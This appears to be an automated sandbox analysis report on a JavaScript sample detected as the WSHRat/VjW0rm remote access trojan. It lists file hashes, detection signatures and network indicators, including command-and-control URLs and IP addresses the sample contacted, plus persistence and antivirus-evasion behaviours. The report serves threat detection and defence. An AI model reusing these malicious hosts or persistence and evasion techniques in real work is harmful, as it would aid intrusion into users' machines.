Windows Analysis Report
Order Requirement 2022.js

Overview

General Information

Sample Name: Order Requirement 2022.js
Analysis ID: 715072
MD5: e873a424159d2557551d0f4684af7a5f
SHA1: 7dfcc66a95100143fae12531151355d2016718f0
SHA256: 0d5a587f0c1dcff512f6112ee48859608db08307aa39887cc71480998d7070d4
Tags: jsVjw0rm

Detection

WSHRat, VjW0rm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected WSHRAT
Detected WSHRat
System process connects to network (likely due to code injection or exploit)
Sigma detected: Register Wscript In Run Key
JScript performs obfuscated calls to suspicious functions
Yara detected VjW0rm
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Drops script at startup location
Sigma detected: VjW0rm
Snort IDS alert for network traffic
Wscript called in batch mode (suppress errors)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
JavaScript source code contains functionality to generate code involving a shell, file or stream
Potential malicious VBS/JS script found (suspicious encoded strings)
Drops script or batch files to the startup folder
Uses known network protocols on non-standard ports
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to query the security center for anti-virus and firewall products
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Creates a start menu entry (Start Menu\Programs\Startup)
Stores files to the Windows start menu directory
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection

Source: http://javaautorun.duia.ro:5465/VreM3:.0 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrew Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrecnkgew0KhN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre63209-4053062332-100 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/Vre Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreYWNlKCIl Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vred Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrecnkgew0K Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrero6 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreMC Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/ Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreoh_AE Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreY Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vresofdowches Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrer Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreo Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreConnectionKeep-Alive Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VredmFyIGZyhN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrej Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/ZpbGU Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vrel Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre$K Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vref Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreh Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre: Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreMe Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreZXNwb25z Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreZXNwb25zf/ Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreS Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VreM Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VredmFyIGZy Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre# Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre1_ Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vres); Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre. Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreoi Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vre0 Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/VrehN Avira URL Cloud: Label: malware
Source: http://javaautorun.duia.ro:5465/Vreor Avira URL Cloud: Label: malware
Source: jbd231.duckdns.org Virustotal: Detection: 13%
Source: javaautorun.duia.ro Virustotal: Detection: 12%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData

Software Vulnerabilities

Source: Order Requirement 2022.js Return value : ['"adodb.stream"']
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']
Source: Order Requirement 2022.js Return value : ['"adodb.stream"', 'mko,56aEstzl,Open,us-ascii,2382rQRreo,Type,151212NeWBHv,171iXGpSV,173920wjKeEW,213970IFnRnT,100300Vu', 'bin.base64,7PdAJRt,replace,7365HgEKJQ,shift,Type,535JemZUP,56aEstzl,213970IFnRnT,612VSSUeT,use stric']

Networking

Source: C:\Windows\System32\wscript.exe Domain query: jbd231.duckdns.org
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.150.138 2022
Source: C:\Windows\System32\wscript.exe Network Connect: 154.120.126.87 5465
Source: C:\Windows\System32\wscript.exe Domain query: javaautorun.duia.ro
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.144.237 2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49726 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49728 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49732 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49733 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49737 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49740 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49743 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49747 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49749 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49752 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49754 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49758 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49762 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49764 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49767 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49770 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49774 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49777 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49779 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49782 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49785 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49789 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49792 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49795 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49796 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49800 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49803 -> 109.248.150.138:2022
Source: Traffic Snort IDS: 2017516 ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 192.168.2.5:49806 -> 109.248.150.138:2022
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 2022
Source: unknown DNS query: name: jbd231.duckdns.org
Source: global traffic TCP traffic: 192.168.2.5:49700 -> 154.120.126.87:5465
Source: global traffic TCP traffic: 192.168.2.5:49701 -> 109.248.144.237:2022
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 109.248.150.138:2022
Source: Joe Sandbox View ASN Name: DATACLUBLV DATACLUBLV
Source: Joe Sandbox View ASN Name: SpectranetNG SpectranetNG
Source: Joe Sandbox View IP Address: 109.248.150.138 109.248.150.138
Source: wscript.exe, 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.816513877.000000D86C2F2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.546074627.000001E4563F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre
Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre#
Source: wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre$K
Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre.
Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/Vre
Source: wscript.exe, 00000001.00000003.379518455.00000228B31AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre0
Source: wscript.exe, 0000000E.00000002.819896845.000001E4548B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre1_
Source: wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre63209-4053062332-100
Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vre:
Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreConnectionKeep-Alive
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreM
Source: wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreM3:.0
Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreMC
Source: wscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreMe
Source: wscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreN
Source: wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreS
Source: wscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreY
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreYWNlKCIl
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreZXNwb25z
Source: wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VreZXNwb25zf/
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrecnkgew0K
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrecnkgew0KhN
Source: wscript.exe, 00000004.00000002.892957672.0000020016F08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vred
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VredmFyIGZy
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VredmFyIGZyhN
Source: wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vref
Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreh
Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/VrehN
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrej
Source: wscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrel
Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreo
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreoh_AE
Source: wscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreoi
Source: wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vreor
Source: wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrer
Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrero6
Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vres);
Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vresofdowches
Source: wscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/Vrew
Source: wscript.exe, 00000008.00000003.394109169.0000029D8001A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javaautorun.duia.ro:5465/ZpbGU
Source: wscript.exe, 00000002.00000003.401450984.0000025291BC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893140463.0000025291BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525315950.000001B9F448D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/1
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/O?
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/ilter-0000
Source: wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org/on
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.882599346.000001B9F3D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.876023477.000001B9F39A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525194748.000001B9F4426000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893517385.000001B9F4442000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.894277954.000001B9F44A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818184193.000001B9F19C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525722834.000001B9F39A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready
Source: wscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready#X5
Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.886964153.0000025291B72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready&
Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready-
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready.
Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready3
Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready32
Source: wscript.exe, 00000002.00000003.401463583.0000025291BCB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-ready?
Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyAN
Source: wscript.exe, 0000000D.00000002.894277954.000001B9F44A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyD
Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://jbd231.duckdns.org:2022/is-readyEM
